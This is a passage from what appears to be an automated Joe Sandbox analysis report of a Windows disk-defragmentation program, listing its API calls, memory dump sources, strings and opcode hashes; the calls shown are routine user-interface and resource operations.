                                                                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00497DC0), ref: 0040126A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3506214061-0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Back$GUBar::CDrawObjectFactory::CreateRectTextDraw$Text
                                                                                                                                                                                                                                                                                                • API String ID: 0-2901586747
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Exclude,?,?,?,?,00427EC2,BB40E64E), ref: 0041D7DA
                                                                                                                                                                                                                                                                                                • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D807
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\Setting Option\Exclude$`=
                                                                                                                                                                                                                                                                                                • API String ID: 0-3794877113
                                                                                                                                                                                                                                                                                                • Opcode ID: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                                • Instruction ID: 1b5e8dd470563cbc387b5fcd8bef698c16006e04536aa332a21aa0bb045417de
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4280b9b7dc6183126e2422d7be14f92861be999e049e1a1ed44a2a1cceede15
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041A371504245AFD304EF55CD85EABBBF8FF88348F00092EF95A82250EB75E944CBA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 004222D6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 00422367
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00422400
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: e5b35e131d48ee43da0b7e9094fe5589d2cefd60023f22f8b9769e6da7b79c13
                                                                                                                                                                                                                                                                                                • Instruction ID: 003c1d75d670e48058873593885aa4881fdd5922b449336556b7ec6c7a2bda3d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5b35e131d48ee43da0b7e9094fe5589d2cefd60023f22f8b9769e6da7b79c13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43418071604311AFC710EF29E880AABB7E4FF88314F444A2EF959DB241D778A944CB95
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 8F$DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3449206993
                                                                                                                                                                                                                                                                                                • Opcode ID: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction ID: c484c337b78f61a7d82ad98e4e7a9c8d2f838ff1f30f5547f561464bca46b6c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 530121707D021A2BEA147E7A8D93FBE01498B85B08F00993E760BDE2C7CDDD8D484229
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,0000008F), ref: 004020B8
                                                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,0000008E), ref: 004020D8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402140: SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402A30: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000200), ref: 00402ADD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402A30: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00402AF7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000101E,00000000,0000FFFE), ref: 00402121
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BitmapLoad$FileInfo
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 945603440-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                                • Instruction ID: 6e2bdab270fbbe96b848c0bd2341101d434f26038ac6356a5de8eec39d30edc5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6219d86c06f6b4ea9bab356f1641f6868412c7640f0c57d9bdc72cfda1377a77
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2411737078071535E130B6B2CE4BFEA224CAF14B04F00452EB759BA1D2CDEC694042AE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,00000000,3401029,0047D9D0,0047D9D0,0047D9D0,?,0041A424,00000000,00000005,?,00000066,00000000), ref: 004226F8
                                                                                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000003E8,00000000), ref: 0042271F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                                • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                                • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402044$8F$CPUIdleTime
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-857541521
                                                                                                                                                                                                                                                                                                • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                                • String ID: Button_Check
                                                                                                                                                                                                                                                                                                • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                                • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402045$8F$CPUUsageExceed
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-3685332712
                                                                                                                                                                                                                                                                                                • Opcode ID: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction ID: ba179efc8f1fc514a3e2d6bea4a1845afbd83289b5d047454f20136ff34bde4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd24271faf9151ddabbf47c82df0d4ed10ac9622f2cea84c7790e46732cfbc9f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB1191B1644601BFD310DF14DD85FAAB7A8FF48B14F108A2EF55EA22D0DB78A844CB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                                • mciGetErrorStringW.WINMM(00000000,?,00000080,00000001,00000001,?), ref: 0041E23D
                                                                                                                                                                                                                                                                                                • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                                • String ID: %s/n
                                                                                                                                                                                                                                                                                                • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                                • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                                • String ID: >=
                                                                                                                                                                                                                                                                                                • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                                • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32 ref: 0041C29B
                                                                                                                                                                                                                                                                                                • #354.SHLWAPI(?,00000002,00000000), ref: 0041C2C8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Time$#354FileSystem
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\AutoDefragmention$LastDefragmention
                                                                                                                                                                                                                                                                                                • API String ID: 253409978-3598614746
                                                                                                                                                                                                                                                                                                • Opcode ID: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction ID: a0b1e6286b276bc7d887fd98d5a7f5957222b11053583dbd66c01ec11ac0fb83
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e82a9422a2e71e94cea5bec6a8f095e47c1f013a3b59e1dfa3399cdb80a3d87a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4115276508701DFD300EF54DD85B9A7BE4FB48720F404A2EF156C22E1EB74A548CB56
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(?), ref: 004672A8
                                                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 004672BA
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004672CD
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CaptureEventMessageMouseReleaseSendTrack
                                                                                                                                                                                                                                                                                                • String ID: 8F
                                                                                                                                                                                                                                                                                                • API String ID: 3622949717-180763933
                                                                                                                                                                                                                                                                                                • Opcode ID: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                                • Instruction ID: 456561867f921ab06e727ae592dfca2a3a58b3b413725f8460958233fe91f338
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0839e7c7c7d8c9402484c13060e54e3869cf2a4a1aa44a0847cf5f14f67a6ab6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B012C705087019FD320DF38D849B5BBBE4BB48718F108A2EF49992290E7B49584CF96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415169), ref: 004150B0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004150C1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 004150DB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_Draw
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-2074868843
                                                                                                                                                                                                                                                                                                • Opcode ID: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction ID: 64c332f81b35f2aaac3873e7666c404af8577304093a8f0924de00557a4645c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2548a7b991ba7467d3f124a8d35b83a44c462a32142ecac1e07a96c10e5a41a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62F0D474601B01CFD7608FA9D988A43BBE4BB58715B50C82EE59AC3A00D778F480CF04
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415319,?,?,BB40E64E,?,?,00000000,BB40E64E,?,BB40E64E,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                                • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(?,00415489,?,?,BB40E64E,?,?,00000000,004070E8,?,BB40E64E,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                                • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                                • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                                • Instruction ID: a4aa5fe1afe6373b8f220277e30d33a61fd8c1e725b86ca142f017733e7708a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471a6d175e438b999421d817673712101ebc98b14ca97b5bbdd216f1f1212e26
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9851E27260124EAFDB289F10E946B7A7FA5FF94310F14452DEA06872B1E739EC41CB90
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042C88F
